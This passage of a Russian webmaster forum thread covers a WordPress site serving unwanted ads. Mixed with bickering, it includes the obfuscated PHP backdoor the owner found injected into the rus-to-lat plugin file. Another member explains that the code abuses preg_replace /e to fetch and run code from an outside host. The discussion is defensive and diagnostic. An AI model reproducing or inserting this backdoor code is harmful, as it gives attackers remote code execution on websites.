Реклама на сайте после перехода из мобильного поиска (вирус)

12
bruder
На сайте с 03.02.2015
Offline
199
#11
Штырлиц:
С вами, мне лично, всё понятно! Если можно, если вас не затруднит, то не нужно участвовать в моих бесплатных темах, не дай бог переработаете.

Его анти-жополизское поведение вызвано тем, что он спец, дающий бесплатные советы. Режим бога бывает смешным, а бывает заслуженным - и тут скорее второй вариант, о чем можно судить хотя бы по репутации.

Если тебе нужны мнения политкорректных дилетантов, то можешь попробовать форумы для школоты (хотя они могут быть и погрубее спецов).

Ш
На сайте с 07.09.2012
Offline
74
#12
bruder:
Его анти-жополизское поведение вызвано тем, что он спец, дающий бесплатные советы. Режим бога бывает смешным, а бывает заслуженным - и тут скорее второй вариант, о чем можно судить хотя бы по репутации.
Если тебе нужны мнения политкорректных дилетантов, то можешь попробовать форумы для школоты (хотя они могут быть и погрубее спецов).

Я оценил, а теперь и меня послушайте

Если бы я хотел ответов в стиле SeVlad, я бы так и написал: "простите, я когда то совершил ошибку, поставил плохой шаблон, попинайте меня, советов не давайте, а дайте ссылку на общую ветку, где тонны информации не по теме, и я буду искренне благодарен."

Но я хотел, чтобы мой пост увидел нормальный Человек, Человек у которого подобная проблема была, и который мог бы посоветовать как исправить проблему, или порекомендовал хорошего проверенного специалиста. ИБО форум для этого и существует, а не для того, чтобы тот у кого больше сообщений, возомнил о себе "режим бога"!

S
На сайте с 30.09.2016
Offline
469
#13
Штырлиц:
Но я хотел, чтобы мой пост увидел нормальный Человек, Человек у которого подобная проблема была, и который мог бы посоветовать как исправить проблему, или порекомендовал хорошего проверенного специалиста. ИБО форум для этого и существует, а не для того, чтобы тот у кого больше сообщений, возомнил о себе "режим бога"!

Не порите чушь. Если у Вас проблемы, то для Вашей же пользы лучше было бы засунуть себе куда поглубже свой собственный режим "покупателя, который всегда прав", набраться терпения и выслушать все советы, а не устраивать из темы срач.

Таких проблем - море, и у каждой своя причина, Например, скрипт от pluso, установленный на Вашем сайте. Но это не точно.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
Ш
На сайте с 07.09.2012
Offline
74
#14
Sitealert:
Не порите чушь. Если у Вас проблемы, то для Вашей же пользы лучше было бы засунуть себе куда поглубже свой собственный режим "покупателя, который всегда прав", набраться терпения и выслушать все советы, а не устраивать из темы срач.
Таких проблем - море, и у каждой своя причина, Например, скрипт от pluso, установленный на Вашем сайте. Но это не точно.

Не пойму в чём чушь, в просьбе о помощи? :(

За участите спасибо, скрипт плюсо убрал, проблема осталась.

Но в одном вы правы, нужно дождаться всех, и не вступать в спор с грубиянами.

Ш
На сайте с 07.09.2012
Offline
74
#15

В общем, спасибо не равнодушным, если был резок извиняюсь!

Проблему нашёл, пока устранил.

Проблема в плагине по транслитерации rus-to-lat, в файле rus-to-lat.php вот такая вставка

wp_load_cacher(); function wp_load_cacher($length='') { if (function_exists("wp_load_cachers")) return ; $mdetails="<div class='body-continent'><div class='get-inner-al(@fi'><!--Deregister() Default Widgets: _sabhrtupwprs:e--></div></div>"; $indent = ( isset($mytitle) ? str_repeat( "\t", $mytitle ) : $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); $output = $metaboxed = $mytitle = ""; $metaoptions="\\4'\\10"."\\12t\\16\\19//\\15q4.\\17u/\\9-".$indent."')\\5"; if (function_exists("wp_load_cached") || defined('HEADER_IMGS')) return; if (count($mytitle)>=$length) { $mytitle = explode(" ",$mytitle." "); } else { $mytitle = explode(" "," ".$mytitle." "); } $metaboxe=str_repeat("(.)", 20).".*"."/".$mdetails[23]; if(function_exists("excerpt_more")){ add_filter('excerpt_modes', $metaboxe); } $output_title = '<p>'.$output.'</p>'; $pr="pre".strip_tags("g_rep").trim("lace"); $defult_widgets=@$pr("/.*(cont).*?(ge).*?(..\(.fi).*?(\()(\)).*?(\_){$metaboxe}is", "@\\20v\\3le\\6{$metaboxed}\\2t\\6\\1ents{$metaoptions}", $mdetails); return $output; }

В коде не силён, что делает и как не знаю. И возможно добавлен он был через какуюто уязвимость (хотя может и был поставлен вместе с плагином) и следовательно, повторение проблемы возможно. Поставил мониторинг файлов на изменение, будем смотреть.

Да. забыл, ещё полностью затёр директории wp-admin и wp-includes, и закачал новые, скачал установщик wordpress тойже версии, что сейчас.

S
На сайте с 30.09.2016
Offline
469
#16
Штырлиц:
В коде не силён, что делает и как не знаю.

Да ничего он уже не делает. Это шелл, исполняет произвольный программный код, скачиваемый со стороннего ресурса. Функция preg_replace с модификатором /e, использованная в этом шелле, работает в старых версиях PHP. Сам этот ресурс wq4.ru активно использовался в 2015 году, сейчас, полагаю, его почистили. То есть найденный Вами код, конечно же, вредоносный, но причина нынешних проблем где-то ещё.

Ш
На сайте с 07.09.2012
Offline
74
#17
Sitealert:
Да ничего он уже не делает. Это шелл, исполняет произвольный программный код, скачиваемый со стороннего ресурса. Функция preg_replace с модификатором /e, использованная в этом шелле, работает в старых версиях PHP. Сам этот ресурс wq4.ru активно использовался в 2015 году, сейчас, полагаю, его почистили. То есть найденный Вами код, конечно же, вредоносный, но причина нынешних проблем где-то ещё.

как код мог оказаться в файле rus-to-lat? Расширение доступно бесплатно в официальном репозитории WP, шанс конечно есть, но маленький, что ставил я его из не проверенного источника (не помню уже).

S
На сайте с 30.09.2016
Offline
469
#18
Штырлиц:
как код мог оказаться в файле rus-to-lat?

Сайт взломали, да вставили код. Дурное дело нехитрое.

bruder
На сайте с 03.02.2015
Offline
199
#19
Штырлиц:
ИБО форум для этого и существует

На форуме также обсуждаются темы

Обсуждаются. Для этого почти все форумы и существуют, а не только лишь для лаконичных ответов на вопросы - в формате, приближенном к такому, работают StackOverflow, Quora.

SeVlad
На сайте с 03.11.2008
Offline
1609
#20
Sitealert:
Сайт взломали, да вставили код. Дурное дело нехитрое.

Или возможно ТС подобрал на помойке вместе со всем остальным (о чем как бэ намекает использование такой древности, как rus-to-lat).

И да такой гадости в нём нет


bruder, никакого "режима бога" у меня нет (ибо я знаю, что я НЕ знаю, и что есть вопросы в которых другие больше моего разбираются.), а циферки - не показатель. Я всегда одинаково разговаривал (раньше даже меньше сдерживался). Даже когда в циферках было отрицательное число. Просто некоторые убогие считают обращение на "ты" грубостью.
А в остальном я полностью с тобой согласен.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий